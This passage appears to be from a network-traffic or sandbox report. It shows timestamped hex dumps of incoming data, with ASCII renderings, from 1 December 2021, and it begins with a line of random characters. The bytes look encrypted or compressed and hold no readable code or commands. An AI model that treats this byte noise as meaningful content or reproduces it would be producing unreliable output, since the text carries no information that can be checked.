vCqjur^d>n<ElL^M'94N*V~iIsf]: >c9{yXV@fR;.H75|;s2Z-Q<sfl0|0I`|7aE
2021-12-01 15:23:14 UTC	365	IN	Data Raw: 1c 28 c6 4c 9d f8 5b b4 29 49 95 d8 ea 21 57 b3 e2 48 7e 7e 47 1d b9 38 f8 8b b7 a5 89 b7 ab dc b5 33 45 8b 94 46 8c 2c 87 aa 97 d2 f3 4c fd 10 b7 3a 79 1f 2d e9 b0 8d a6 9a d2 af 35 e8 3d ed 40 17 e1 37 ff ca 47 8a 12 02 e7 86 d1 b6 73 a8 c6 39 cc 03 16 0c e5 14 2d 3a eb 8b a9 8b bc b3 0c fe d6 69 87 36 76 fd d2 70 aa 9c 79 94 f5 af c2 76 0a fb cd d3 e9 94 47 09 6e 1d 5d c7 09 0a f4 59 23 eb 68 5a a5 e7 10 42 c0 af 0e 12 92 db b0 66 4a 01 07 89 3c 8c 0d a7 4b 03 7e 04 65 a6 4d fb 37 95 54 db 9d fb c3 53 31 c1 51 01 c0 e6 ec 3d f3 a5 73 80 40 fe b7 41 9f 0a 9b 65 b0 c0 3e 92 1e 51 a9 88 92 46 8f d0 8a f2 31 dc 1c ac a8 64 54 3f bf 8b c2 ca 5e 49 0e 19 84 81 42 6b a8 40 fb 56 84 de d7 7a 9e ec 0d 75 87 b6 58 69 84 ca 36 30 f4 42 9a 47 8e 3d 13 29 8a 15 95 Data Ascii: (L[)I!WH~~G83EF,L:y-5=@7Gs9-:i6vpyvGn]Y#hZBfJ<K~eM7TS1Q=s@Ae>QF1dT?^IBk@VzuXi60BG=)
2021-12-01 15:23:14 UTC	367	IN	Data Raw: a0 fd 51 24 24 32 4a 4b 04 1e 47 8b b5 38 7b 9f f7 df 9a 5c 99 59 8a 27 ba 22 b7 3c 71 61 4f a3 dd 6a 07 ea ad c8 dc 1c 3d ae e8 05 71 69 f8 34 b2 1f 89 a2 f7 08 ff dd 9c 37 d6 17 85 b0 b3 1b ba b6 bd 8e d5 63 dc 42 87 a8 92 4d f8 44 f4 a3 7c 81 b2 85 b5 36 09 56 95 cf 7b 15 e6 1d 25 98 44 07 fa 5f 48 82 df 55 9c f4 d4 d5 ba a9 ff ad 95 af 00 c7 52 b2 c9 af a4 67 4e 38 f1 99 5a 9d 0a 66 58 bc b5 39 ff 35 1f 28 cf ad 1f b8 b0 c2 c6 d3 77 9c bd 3b 07 e7 b4 55 27 ac 89 e4 12 b3 04 f7 51 35 b3 30 aa 80 0e 8f 5a be 5c 22 d1 ef 2e 45 59 f5 6e f2 28 db f5 74 93 43 fd d8 fc d9 68 63 a9 56 51 ce c1 38 31 c3 58 37 c5 4e 25 98 4a 19 d2 f2 2a 43 88 bc ea 28 58 a6 8b 2a d1 31 3b d1 1b b6 be a4 f6 67 5b cc 91 b6 b4 a6 67 87 b6 bc a4 77 7e 49 8a 8e 46 9f 64 57 33 c0 a4 Data Ascii: Q$$2JKG8{\Y'"<qaOj=qi47cBMD|6V{%D_HURgN8ZfX95(w;U'Q50Z\".EYn(tChcVQ81X7N%J*C(X*1;g[gw~IFdW3
2021-12-01 15:23:14 UTC	368	IN	Data Raw: c3 3c 88 bd dd 87 48 14 9d 97 c8 cd 4a 71 a0 ed 26 57 29 de 12 5f 40 de 14 17 19 ac 8b 23 7e 1d a3 30 f2 a3 29 ce 60 d0 3d 59 b3 95 ff c5 50 be 59 64 0d b2 82 33 41 7e 01 d9 65 e6 dd 46 16 28 6e e9 b0 93 21 e1 46 44 9d ff 56 25 ab 1a e3 18 9d 90 50 a3 ef 5c 3d d6 28 ac 8b a3 76 7e 0e ad 25 54 20 78 e2 65 58 c6 28 70 bd 97 68 e3 19 4d f5 50 fe c8 b8 b0 8d a2 64 2d 26 ef b1 01 44 9e e4 9b f5 cd 41 1b 77 84 d5 42 06 f9 cb 42 91 c7 22 0c 05 7f 9d 54 c3 11 eb 5d 5e d0 19 4a 9b b2 c0 40 7f 88 a3 67 ed 55 bf 75 89 b0 8f dc ec 41 38 dc 18 01 d1 ec 30 49 06 e2 ee 11 f8 a9 16 11 06 27 a2 f4 3b 1e b1 0a 09 b8 7c be cb d9 55 f4 49 33 23 1f 99 d5 6e e3 95 c2 1b a8 23 06 83 6a e7 0e 9f 1b 16 80 9a 59 21 a8 a7 e7 18 0f 8a e5 23 38 27 a1 ef b4 ba bd cc 0d 59 33 db 9b 06 Data Ascii: <HJq&W)_@#~0)`=YPYd3A~eF(n!FDV%P\=(v~%T xeX(phMPd-&DAwBB"T]^J@gUuA80I';|UI3#n#jY!#8'Y3
2021-12-01 15:23:14 UTC	369	IN	Data Raw: 25 a2 6d e0 2c 43 80 3f 25 03 f6 d0 f3 25 93 00 c4 2f 32 09 31 dd 95 c8 50 d6 f6 a0 8d eb 34 0a e9 bf b5 12 01 aa 6d 44 83 bd 26 33 2f 5e 98 bf 11 6b 80 be 90 a9 8a 63 b9 51 e1 16 8c df 70 af b9 cd 4a 41 f3 83 f1 44 0a a1 66 bd c5 51 35 fa a8 63 da 33 d8 49 7e be 9b 54 bb 27 3a ae 95 ca c7 89 91 d2 f7 d0 79 13 e7 1b 35 b7 a7 6b 3f 73 fc 0c 7a 93 ac 06 65 4e 28 c8 c3 cd dd 85 29 54 d2 74 60 b3 99 48 e8 a2 e7 fd 5e 49 70 26 b4 2f b6 38 fc 35 7e 8c 0e 96 df a3 70 6e 8e cb cf 4a 17 00 f4 93 4a 0b 58 3d 62 ab 9f 65 09 6f 61 56 50 54 38 9d 8f 47 ea 08 7a e6 23 35 ad 66 c6 d0 f4 24 fb 20 3d f5 4e 8a 3a b8 43 25 12 89 b3 07 ed 86 34 ad 81 39 83 40 2d 40 0c ea 2a c5 39 e9 60 32 36 bf 9a 5b 59 b3 63 4d e5 13 60 8a db d0 27 cc c7 56 33 ac 89 70 8d a6 6c e8 78 1e bc Data Ascii: %m,C?%%/21P4mD&3/^kcQpJADfQ5c3I~T':y5k?szeN()Tt`H^Ip&/85~pnJJX=beoaVPT8Gz#5f$ =N:C%49@-@*9`26[YcM`'V3plx
2021-12-01 15:23:14 UTC	371	IN	Data Raw: 6e 02 f7 ed 55 2c 40 5f e9 8e 61 59 26 5a b5 0e da ed dd d0 ef a1 92 48 e5 45 0e 2e 08 ef b7 47 01 7c d1 6d ef f0 b2 eb b7 3c 61 40 57 d3 6b 48 fb d1 6f 20 38 48 54 a5 8c 60 cf 69 06 e4 3c b2 9f ca b5 26 33 b4 b0 bc 68 e0 86 16 99 f5 cf 66 c5 45 24 d0 ee 1d f4 40 71 19 97 f2 f3 a9 2a 13 84 33 ba b9 08 39 ff f1 e5 8d af 73 72 d4 2f d4 73 3f 76 34 44 9c 79 8e 37 1a 11 a9 68 ea 35 83 a7 81 61 55 4f 44 85 a1 9b f4 6a 25 b5 08 a5 fb de 6d e6 2f 5a 97 c4 c8 c2 59 15 9f 71 51 28 d1 67 55 3d 75 73 6d 77 99 51 ae f5 d8 e7 8d 99 4c 87 ae 92 58 bc 3a f4 14 a9 9f 08 60 2e 70 5c 3c 88 95 d7 d1 8a 32 d5 8d e6 87 6a bd 99 fa e2 46 fb f0 13 fb 58 4f 8a ba 4a 65 e2 f9 95 56 27 44 20 cc da 71 04 eb 0f e5 0e f2 53 8a c7 4e d8 84 96 7d 32 3c 06 c5 5a 20 34 de eb 58 38 96 a0 Data Ascii: nU,@_aY&ZHE.G|m<a@WkHo 8HT`i<&3hfE$@q*39sr/s?v4Dy7h5aUODj%m/ZYqQ(gU=usmwQLX:`.p\<2jFXOJeV'D qSN}2<Z 4X8
2021-12-01 15:23:14 UTC	372	IN	Data Raw: cb df 03 89 77 38 17 3e 64 c0 b8 18 75 29 ee f8 bd bb e2 ad 03 e0 e3 27 58 ab df 67 d9 f4 ad a8 ff 08 e5 7d c8 11 9d ff c5 68 41 19 84 39 62 f0 36 c4 5c 35 23 14 81 3c 83 25 5f 5e 2a 5d 89 56 0a 60 22 fa 17 cc 21 92 ee 20 20 31 76 25 6b 95 76 69 e0 83 bd be 43 a0 90 5b 85 59 b8 3d 1e 86 07 a2 65 57 1b 29 3f f0 1a e6 e8 34 7b 0d 92 cb cc 2e 45 2b 50 5a 20 c5 aa 89 97 37 15 12 99 36 7a 29 51 d3 f6 d3 90 4c b7 a7 0a 7e ec d3 64 f0 da 15 7a 8c ac 62 51 b4 4f a5 10 fc 07 7a 16 14 1f 31 ac 81 55 d9 98 a7 d5 ba c4 65 6c 19 89 f1 98 88 3b 13 fd 3d 6c bc 57 de cd 4d 72 ff 26 38 71 ff 06 fe d4 36 6b 7c 39 9d 64 a4 7f 34 26 fd db 3a 10 c6 c4 35 b8 c8 24 27 ba f1 ed 51 dd 6e 82 7f a9 7a cf 84 a8 dc e6 fd 83 19 7d 8b a1 76 dd 81 32 91 c1 33 fd d2 52 84 e2 13 2c 66 14 Data Ascii: w8>du)'Xg}hA9b6\5#<%_^*]V`"! 1v%kviC[Y=eW)?4{.E+PZ 76z)QL~dzbQOz1Uel;=lWMr&8q6k|9d4&:5$'Qnz}v23R,f
2021-12-01 15:23:14 UTC	373	IN	Data Raw: 16 86 02 e6 85 73 32 ab 8f d1 6c 20 ed b2 e0 ea 3a ef 29 3a 74 e1 8b a1 fa 6c e4 9f d9 8d a6 6f 73 6d 75 e4 3a 02 e6 13 dd 96 26 b8 a7 74 73 64 d4 3b 3a 64 f4 ee 3e e3 d4 f5 d3 6d 7e 1e 22 1e 9d ff 5d d5 69 7e 07 7a 0b 5d 1d a5 d3 07 6b 67 22 bb d6 64 50 b7 3b 31 38 63 79 77 81 a3 81 2e 55 b8 21 5b 52 b3 03 7f b7 4f 21 b8 27 a7 e3 8e 53 2d 50 38 fd c4 5a 2a 42 86 78 8c 6a ee 91 bf d1 1e 2a 5d ac 03 36 87 8c aa b0 97 2e d4 90 a4 fe 86 20 83 db 1a 0e c1 d2 7a 99 de 82 d6 f6 dc 1a a6 b6 b9 a6 0a 67 33 cf 6c 85 5d 1c bb 6c a6 fb a2 bc 94 ff 48 8d 01 9d ec a3 82 bc ea 2b df e6 ea 7b 02 88 92 da d3 de 5f a8 04 fb 79 41 e8 a7 86 b1 4d 04 f4 2d 36 0a 7b c0 bb a0 40 c6 50 50 ac 3a c0 c7 9f 91 21 5e bf 18 6f 93 47 54 4f ad cc d6 5a 9b 60 df 47 ef 37 18 18 9e 70 fc Data Ascii: s2l :):tlosmu:&tsd;:d>m~"]i~z]kg"dP;18cyw.U![RO!'S-P8Z*Bxj*]6. zg3l]lH+{_yAM-6{@PP:!^oGTOZ`G7p
2021-12-01 15:23:14 UTC	375	IN	Data Raw: 63 03 8b cf b1 1d bf 25 ab e5 13 19 85 48 cb 5c 35 f2 3e f7 5b 5e 51 5d 4e 2a 33 13 36 b0 8e 4a 8f db 7e 9c ed f5 24 6f 14 f2 3f e2 95 53 2d 4b ec 49 f1 31 43 0b 8b 64 ca 31 8a d3 38 77 96 e6 69 e3 e9 43 8b cd 54 e6 6e 7f b9 b4 ca 3f 89 34 d5 79 51 35 6f 92 5a 59 e5 8b 55 61 f6 1b a2 60 76 6b e7 b5 2a cb 27 aa c3 6b e9 d2 6f 25 55 44 56 f0 03 80 9b 89 3f 6f 76 98 0c ee d3 eb 76 f0 dd 68 72 64 8c d5 1f 20 d9 60 d5 fe ba a7 1a f0 ae 01 4f d3 07 aa 6c f3 ac 1e bc bc 2e d2 f9 2e d2 17 c5 af c9 4c 61 00 e9 ca c6 c0 1c 53 a3 c5 f2 a3 df 89 89 9e 8a af 65 d7 27 5a 94 5f 5a d8 6e 60 d4 12 83 f1 34 08 01 50 a6 6e 4b 33 05 76 02 f2 34 b8 25 33 8d bd 26 25 59 ef 31 5c e3 8e 53 23 e6 50 ab 0b 6a 74 1c 26 f0 32 4b 16 12 ef 3a f5 a7 0d 2f 28 b7 3d ef 62 d0 f6 48 8d 33 Data Ascii: c%H\5>[^Q]N*36J~$o?S-KI1Cd18wiCTn?4yQ5oZYUa`vk*'ko%UDV?ovvhrd `Ol..LaSe'Z_Zn`4PnK3v4%3&%Y1\S#Pjt&2K:/(=bH3
2021-12-01 15:23:14 UTC	376	IN	Data Raw: 23 b9 c2 ae a4 66 cb 5f cd d1 e1 8c 24 2d 28 14 84 2b d4 e8 a6 84 6b fb 89 5a a4 6a b1 bf 64 ce fe b5 b1 96 db 98 41 18 e1 1d 3c 39 1f f8 0b 63 55 22 a2 90 0c 01 7f 7b 95 d7 6e 79 17 a8 70 7a 86 a0 71 62 c9 b1 f7 a3 3a 7e 0a f6 c1 b7 2e de 23 0e ae 9d 7d fa 8e a1 61 cf 6d e6 3b 7e 05 72 e7 19 ca 6d 1b 29 4b 1a 8c 26 3e 05 6b 98 3c 9e 68 fc 43 9c 1a 18 99 f5 03 97 5a b4 07 a8 9f e1 92 3c 8a cd 0e 10 1b b8 ba 3f d0 e0 8f eb 72 ae 40 f7 c5 c6 50 ad db 09 65 e6 8f 4d 34 52 19 82 ec 02 6d f2 20 db 25 db 65 97 5d b0 72 16 98 09 9e 19 1a e9 ac 64 78 22 d2 25 3a 6b 9b 0d f9 ad fa 3b ce 82 e5 0a 3f c0 f0 ba 4c 14 56 32 db 85 2d 9a bc 5c 51 eb ac 71 a7 ef 7b 88 d0 1b ff a7 eb b0 88 d2 b9 15 8a 28 50 3f 35 ea ce c8 dd 0e ec 3d f3 a5 ad 31 de 12 16 9c 4f d8 ff f5 3b Data Ascii: #f_$-(+kZjdA<9cU"{nypzqb:~.#}am;~rm)K&>k<hCZ<?r@PeM4Rm %e]rdx"%:k;?LV2-\Qq{(P?5=1O;
2021-12-01 15:23:14 UTC	377	IN	Data Raw: de 18 1a 9a 66 3c 67 59 27 38 f3 4a 8f dc 10 ff 29 21 34 cb c2 4d 9b 02 f6 4b 06 15 7d 6e aa e1 f9 dd 83 41 85 5f 2a a3 7e e5 09 fa 2e 49 0f 9b 19 11 12 5a 4d fd 35 6a 17 c1 dc ef e3 f9 14 b6 aa 81 25 d5 da 64 f3 7d 61 df 0d 9e 74 e2 01 b3 fa 6f 16 1f b8 af 95 ae 8c d7 93 55 58 51 5a 3e e3 77 9e 77 9c b8 00 39 35 f2 a3 7c 4c 8e 41 10 fe d7 e2 77 63 b9 df 18 51 11 99 d9 6c 0e fc b2 7b c1 3f 9c 75 8f 48 d7 9f ed be bf bd 4a 34 da de d0 f0 d3 8a 69 5a a5 e0 13 0a 80 1c c8 38 ef ec c2 b5 a4 ee df 8b a3 e7 0d fb e4 11 8d a7 e2 99 e3 80 04 f9 2a a2 23 93 d8 eb a4 f3 30 1f ae 81 a6 fb f3 a5 44 f0 fe 43 8a d1 36 9d 60 5b 5a 39 bd 32 a3 72 6f 17 c4 0a ef b0 85 38 ed 46 8c 27 ac 1c 08 07 b5 23 26 ab 1f 48 68 1b f1 23 a0 7f 96 d6 86 25 58 e3 6b 78 18 1c c7 ca e4 ff Data Ascii: f<gY'8J)!4MK}nA_*~.IZM5j%d}atoUXQZ>ww95|LAwcQl{?uHJ4iZ8*#0DC6`[Z92ro8F'#&Hh#%Xkx
2021-12-01 15:23:14 UTC	379	IN	Data Raw: 7b 78 5d 66 f3 d3 60 d1 ef cf 80 93 b9 26 b5 27 b9 3c 7c 8c d4 e4 b7 d2 1c 2a c7 63 4e b9 34 d6 60 d8 1a c1 4d 88 ae 9c 9c b2 78 ef 58 df 17 f2 27 a8 1b df 79 29 2e 43 0f 06 a3 e4 15 8e ce 22 d9 d7 82 2b cb c0 ce f0 39 ea a2 bd c5 eb a9 81 8f da e4 01 ff 96 39 fa 53 35 2e e6 99 5d 47 d9 65 be 6e fe ca 37 bc 5c 52 e0 63 53 35 f9 29 20 cf e7 1e 38 90 a9 f8 a2 ef 58 a4 57 a3 d5 7d 10 2d d3 33 6b 04 fd cb de 7f 25 3f d4 38 70 7e 8a c2 76 7f 43 01 d9 fd c2 4a 81 31 38 6d 86 d1 32 6d 0d 66 c7 c1 aa 7d 10 84 d7 f8 df 98 de f6 48 7c ee c8 3c 83 58 e8 9a 21 b6 b6 20 5d be 3d e8 26 31 54 25 a7 e7 8e d5 fb 7b 9e 78 0c 02 09 12 10 73 62 c6 54 d1 6a 0b 92 a4 f6 11 64 aa 4d b0 1b 34 cd b1 e3 14 ec b9 0c 7c 13 8b a3 7e 83 bb e5 60 45 e8 a9 e2 ea c2 9b eb b0 8d ac 10 7b Data Ascii: {x]f`&'<|*cN4`MxX'y).C"+99S5.]Gen7\RcS5) 8XW}-3k%?8p~vCJ18m2mf}H|<X! ]=&1T%{xsbTjdM4|~`E{
2021-12-01 15:23:14 UTC	380	IN	Data Raw: 75 d3 f9 d9 7a 1d 29 44 dc 1d bc af ec 74 20 71 60 dc 98 24 26 b0 00 d8 fc ba 35 de 54 b1 0c fe b5 ad 8e 12 15 88 2a b9 74 3d aa 9f fa d9 fb 58 ed bb 37 fc db a5 e0 ea 74 27 dc 17 8d 64 ce 3d f7 4a d2 b7 22 2d d5 9c 9c 3e cd 02 f0 30 da 3d ed 50 f4 e7 ca d1 7b 14 7f 63 51 02 1b 2a ca b7 33 c6 df 70 07 02 57 17 92 53 a8 19 16 41 14 1b a4 f4 35 e3 73 2f 66 85 b4 b1 80 fb c1 ae fb d6 96 4c 8a ad 7d 96 45 7f 60 44 1c 2d 3c fc dc 57 24 2d d5 92 13 8a 6c f3 ac 1a 61 d9 28 58 bf 20 a2 57 2d 2b 9a 42 e0 1d bc 3c f6 13 90 5d 5b b1 7c 7a 59 2d cd d2 c1 49 1a 6a 1f 2e ca be a7 e0 1a e6 9b a9 54 bf 23 af f4 15 b3 71 64 cf e7 00 42 ea 36 76 02 65 21 a3 12 5b 6f 22 34 4c 14 96 0e e5 ca e6 40 6c e6 9e 1a 1f b7 03 80 91 23 d5 95 57 a5 93 df 94 44 60 97 92 17 8f d8 76 88 Data Ascii: uz)Dt q`$&5T*t=X7t'd=J"->0=P{cQ*3pWSA5s/fL}E`D-<W$-la(X W-+B<][|zY-Ij.T#qdB6ve![o"4L@l#WD`v
2021-12-01 15:23:14 UTC	381	IN	Data Raw: b5 27 a6 6c ee b0 0a f5 5d d0 f2 b5 a8 95 a2 e2 2e c4 d1 70 eb 73 e9 2d fb c5 4a 86 40 48 c6 c8 ca 50 70 eb 74 e3 45 a4 fe de 3b ec 34 45 f3 58 e1 cb a1 e8 33 49 8b a8 5c d2 7b 0d 5e 39 7f 7b a8 6a 27 ac 51 35 33 c6 d4 e8 24 e1 9c bf 23 63 56 46 1c af 2d ce fa 5c 32 9b fb 36 3a f5 b3 07 73 fa 39 00 58 96 9e 79 63 da a4 89 cf f1 5b 11 4a 8e 96 5a 47 ee 62 63 71 6b 73 ff a8 89 96 4c 85 bb 3c 9c eb f2 ca ac d8 31 e0 92 94 f4 71 ef 21 a9 ca 93 b8 53 ca 58 e7 07 35 fc 59 31 c4 2b 66 ae 4b 1e 2e 41 05 90 c3 df 93 d3 72 ee c9 8c bf bb 29 db 9b fa 1a 18 7a 12 12 8c e5 91 52 de 0c 61 9b 4a 99 1d bd f7 3c b2 9a d0 a7 e7 80 07 75 63 bf 5f a4 29 d6 f5 4e 8a 3e 2d 4f fc 51 b2 00 c7 57 23 b0 64 36 30 c4 98 40 66 57 b3 10 1d bd 24 ca 8d 0e 5d 57 32 75 67 50 a3 ef 64 59 Data Ascii: 'l].ps-J@HPptE;4EX3I\{^9{j'Q53$#cVF-\26:s9Xyc[JZGbcqksL<1q!SX5Y1+fK.Ar)zRaJ<uc_)N>-OQW#d60@fW$]W2ugPdY
2021-12-01 15:23:14 UTC	383	IN	Data Raw: 7c 81 a9 e8 c5 6a 79 84 37 e1 16 68 04 38 79 16 87 b5 3a 7a 0b 94 df 6c eb 4d fc 74 b3 04 e9 bb b6 d9 6f fd a2 b7 95 42 07 7e 13 88 28 bc ea 66 84 3d eb 26 7e f8 45 14 1e 3a 43 fc d0 70 e6 1c 39 fe a2 94 07 2a 2e 4a 8a bf 10 06 06 ca ce fa 56 ac 61 d6 aa 69 12 8e d8 4e b3 04 f6 a1 13 da aa 87 b6 ba 27 94 5b ab 2f ca cc c5 52 47 89 eb 47 79 fd ff eb 48 0f ad 08 67 4b cf e4 f8 c1 12 f7 43 c5 4f a4 52 ec 23 ab 18 14 ce 33 53 5d 0a e4 01 4e a5 3f 1e df 76 55 1f 52 ac 9f 66 13 81 7c 0a 29 3a 87 59 b9 b9 86 46 ac 5c da ee f3 a5 2d da 01 be ea 7d 45 19 86 ae e2 a7 7b b8 6e f7 32 bd 16 de 0c eb af 95 ae 8c e3 85 62 cc 3e 9f b5 0d b8 b0 8b 66 c7 91 3a 88 db e5 b0 5b 50 a6 f1 92 b2 13 12 b9 2a 49 12 e0 2b df 8d ad 14 e1 7a 7d 31 f1 55 d1 4b 53 6a e9 1d 81 e3 76 82 Data Ascii: |jy7h8y:zlMtoB~(f=&~E:Cp9*.JVaiN'[/RGGyHgKCOR#3S]N?vURf|):YF\-}E{n2b>f:[P*I+z}1UKSjv
2021-12-01 15:23:14 UTC	384	IN	Data Raw: e3 fa 5d 5c de 11 60 1f 2a b7 c2 59 6c 01 22 48 83 a0 77 96 97 d3 86 e8 bd 33 8e ea 22 22 2b 4b 6a e5 73 52 b5 33 d0 fa a4 a2 e9 58 48 1f f0 c1 36 eb af 09 b4 42 02 7e 7e b7 3a 76 8a 3a cd d5 8f ce 02 6f f8 b8 32 5f 52 22 b3 1d 57 ad 8f 0d 7c fa 22 95 b5 3f e3 19 d8 db 2a 57 3a e5 06 e5 86 40 87 23 3e 2c e1 80 12 ed 21 51 b9 34 b3 4c 66 b5 39 f5 4d 9a 75 3a 72 e2 1d 29 cf f9 b8 53 96 25 61 c6 4c 0f 81 47 60 df 91 d5 6a 0e d2 6a 17 72 60 9d 0c 86 d0 3b 04 13 63 ec 17 93 de 33 05 a6 19 eb 40 f0 6e 77 d9 71 9c 81 49 96 d9 f4 c1 c4 8a 7b ec 5e 76 10 54 ae 26 e1 45 76 4d e8 17 79 ac 9e 26 72 57 18 00 7c df 08 36 23 fb b6 b6 22 f9 e5 33 e4 12 c9 49 6a 86 5c 76 0f 27 d3 2e 76 4d 26 1d a4 9a 16 7e 7d 0e ba 42 0c 2d 98 b1 a6 3e 1e a7 a6 2f 7b 0a 68 f3 07 49 f0 03 Data Ascii: ]\`*Yl"Hw3""+KjsR3XH6B~~:v:o2_R"W|"?*W:@#>,!Q4Lf9Mu:r)S%aLG`jjr`;c3@nwqI{^vT&EvMy&rW|6#"3Ij\v'.vM&~}B->/{hI
2021-12-01 15:23:14 UTC	385	IN	Data Raw: e5 6f 98 be 21 da 17 e5 70 d4 4e 40 f7 9c 84 a9 c6 c7 c1 3e 41 0c ea 24 39 33 d4 76 8d b6 54 5b 2c 6b 2e 44 82 ae e4 1d 4d f7 b2 14 eb a8 18 b4 a4 fe de 02 53 28 51 2d d6 38 7d 24 2d d3 7a 08 38 99 5c b3 db 76 8b 2b 34 b3 fe ba 40 17 0c fc 4e b2 01 2c 4b e5 6e 84 8f d5 6a f5 d8 3a 6d c1 45 0c e5 8b 6e 03 e1 e7 41 00 4f b6 58 5d a1 1b 50 c8 c5 64 c3 40 f1 cd 53 c6 24 42 fc 39 e2 b2 92 07 ab 29 e5 37 49 36 3b 2c dd 73 ec 71 f3 26 22 a0 ad fb c9 4e b9 34 9b 0f 19 0b 7d 10 97 a1 ee 28 50 16 ed 5a 6c 62 5f b6 5e 57 b5 0d d6 ed b5 ac 1f a9 82 ce 15 13 0d 0c 5d 43 1c a5 74 fb 56 5a 58 3a e3 eb 1a 0d 64 5d d5 75 0c 02 18 91 54 c0 13 9c 67 db 37 e2 c5 4f ae 19 e6 ae 8b a5 13 6a 32 40 29 e3 8b a3 ee b0 ea 3a 80 6b fd 28 dc 63 bc c8 51 28 c8 fa 47 a9 6e 1d 37 b1 9d Data Ascii: o!pN@>A$93vT[,k.DMS(Q-8}$-z8\v+4@N,Knj:mEnAOX]Pd@S$B9)7I6;,sq&"N4}(PZlb_^W]CtVZX:d]uTg7Oj2@):k(cQ(Gn7
2021-12-01 15:23:14 UTC	387	IN	Data Raw: c2 64 35 64 b1 f0 a4 bb 38 97 a5 70 c5 57 2d d2 fd d0 f5 d8 ae f1 e2 09 6f f2 47 1e ad 8c 50 bd 25 bf bf 19 44 8c d7 11 14 d4 ef a7 02 b8 50 92 53 36 e2 60 cb 81 ad a1 e8 33 25 e0 f4 23 a4 7d 11 f3 aa 18 99 dc 05 6f 60 24 d8 8c 13 2e 1e d3 70 1e ce 6e a4 87 2b 3e 79 0a 6c b4 ab 06 ea c6 cc cb bf 28 5b a4 de 78 89 20 2b 66 db 08 d0 2a 05 8a 32 07 6c 8a 38 ec 68 48 8b a5 ed a8 04 30 e7 87 0a 99 51 aa 8c f4 30 bd 27 75 91 fe 40 6c 0f 02 70 fe c6 55 26 b2 27 e5 5d 27 a7 e4 96 c1 46 1c 0b 65 13 9c 67 d3 47 0e 8e 6e f8 db 8c 3a f4 48 86 f5 b7 83 b2 7f 19 44 46 0b a9 dc 57 5d a7 fc 47 f6 15 e5 18 01 4f d0 8b 7f 64 c0 b8 7e e8 c3 65 f7 6b 71 66 31 bc d4 6a f7 c4 27 d3 97 63 50 bd da 99 62 33 c1 57 cd 04 c1 5c db 9a ba 8f ff cb 54 b3 f9 94 19 8e 44 9e 84 4b 53 3c Data Ascii: d5d8pW-oGP%DPS6`3%#}o`$.pn+>yl([x +f*2l8hH0Q0'u@lpU&']'FegGn:HDFW]GOd~ekqf1j'cPb3W\TDKS<
2021-12-01 15:23:14 UTC	388	IN	Data Raw: 74 7d 86 29 00 d1 e9 bd 21 71 7b 17 10 fa dd 8e 14 1d 29 50 46 1d ad 93 b5 24 24 35 ff 5a 5f 5a 39 fa 42 55 30 da af 87 6e e5 14 ec 31 07 7e de 0f 99 c0 b1 e5 1c b5 37 1e f4 59 ed 53 3c 6d 72 1a f3 d7 0b 3e 61 41 9a 2c bb a3 80 d1 6d 89 41 ad 25 53 a2 26 d7 01 d6 1e cd d5 e6 18 e1 44 82 fc 44 17 0b 61 a1 61 59 e7 88 f0 25 67 42 65 a0 89 50 f0 68 ae 8d a6 f3 8d 0a 4d 78 85 de 02 a8 a0 98 b3 f5 42 ab 8d e8 cd 28 ad 9c 0f 40 a6 89 50 31 17 9f 24 b8 e6 e6 df 69 e3 ff 21 51 cc 5c 17 94 8d 2c ab 5b 4b 60 d3 7c 89 72 0e d6 e6 f5 ae 94 22 37 ff 5c 3e 96 88 c5 a1 9d fc 2a 5b 59 b0 03 68 38 78 ff 3f 24 26 f8 59 f0 3b e0 0b 79 5b 4e 61 4a 4d 09 b5 31 23 c0 bd a2 6a fe 47 89 6b 6d b1 09 8f 99 6b 4d 0f 86 ab 72 72 61 7b 57 3b 07 8e e5 b4 4c 72 8f 4c 97 01 52 71 88 dc Data Ascii: t})!q{)PF$$5Z_Z9BU0n1~7YS<mr>aA,mA%S&DDaaY%gBePhMxB(@P1$i!Q\,[K`|r"7\>*[Yh8x?$&Y;y[NaJM1#jGkmkMrra{W;LrLRq
2021-12-01 15:23:14 UTC	392	IN	Data Raw: 5e 34 4f f1 ef 36 ab fe 5f 85 d7 f5 09 c0 a7 3a 1d 28 9f 5c db 4d 6c 67 89 0a e7 47 20 a2 af b6 bf fa 63 cc 1c 86 31 1d 9c ba 05 e2 86 57 ec 34 b0 bc 2b bd 2f 8b 35 c9 44 88 a2 93 e0 de 15 7e 49 ea 5a a5 e3 18 8b 9b 0d 9e 49 ff a1 e0 08 77 fb 30 d4 6c f0 ad 25 b5 a9 d5 62 cb 47 d0 78 e8 02 6f 95 df 97 58 2c 5c 31 1a 07 b8 af f5 2e 36 d1 86 30 42 1b df 75 21 d5 f4 6a ed ea 59 c1 c5 df 15 62 35 70 83 23 d2 01 21 d8 e4 dc 6d 34 9e 22 1a 5b 69 85 24 6c 6a b2 21 50 46 65 ce 20 38 e5 b1 d4 f0 26 33 12 10 05 7e 1e c0 ce 70 e9 bf 3e 60 d3 35 3a 44 9f fa db 60 24 90 64 4d 6d 66 32 bd b5 b2 e0 91 57 4b 9d 72 8d 3e ec 4c 13 0c 9d 67 c2 90 cc 55 5b c8 5b 17 12 89 b6 5e 2f 03 63 ba 7e 6d fa 39 e0 00 ae 0c d3 71 58 e4 77 94 55 bc 27 35 65 21 a3 12 ec 33 a8 19 b8 a3 74 Data Ascii: ^4O6_:(\MlgG c1W4+/5D~IZIw0l%bGxoX,\1.60Bu!jYb5p#!m4"[i$lj!PFe 8&3~p>`5:D`$dMmf2WKr>LgU[[^/c~m9qXwU'5e!3t
2021-12-01 15:23:14 UTC	396	IN	Data Raw: 1d 6c d6 ed bf af 92 52 a5 eb ac 01 a3 4a 0f f6 45 e2 7e f2 1c 3e 60 41 8b bd 3e 69 69 bf 23 31 57 55 d6 12 52 d4 ca c7 40 ec 6d 6e f1 be aa 62 86 8d 82 3b e9 a5 d8 6e 76 04 e0 0d 6d fc d7 7a 1d be a9 ea 4a 21 8d a9 02 66 54 ae 9f f0 2f 2a a6 94 34 4b 3c 62 d1 e4 32 e8 ae e5 58 be 71 66 3d a5 74 df 9b f8 c8 a1 f3 54 44 6d e8 7d 78 7f e3 5b 80 ec ef 7a ae e2 07 3b 3e d9 e1 cc 90 af 9e 31 41 5e 8e 47 11 99 2d 29 24 ef af 01 5a a7 7b 09 ae 84 2b cc 01 43 f3 93 52 b8 b7 3f e0 17 e6 8f d6 e6 68 64 03 62 c2 c5 53 75 05 57 27 b0 59 39 f1 af 15 14 80 de 13 95 c8 0d 60 22 1a 9f 32 49 14 1f ae c1 ed ef ab 19 04 13 83 07 46 1d 67 5d ba 70 ef 56 54 db 0d ae 8e 5a ac 3f 24 fe 80 64 4f e2 00 d1 6d ae 4e 6a e0 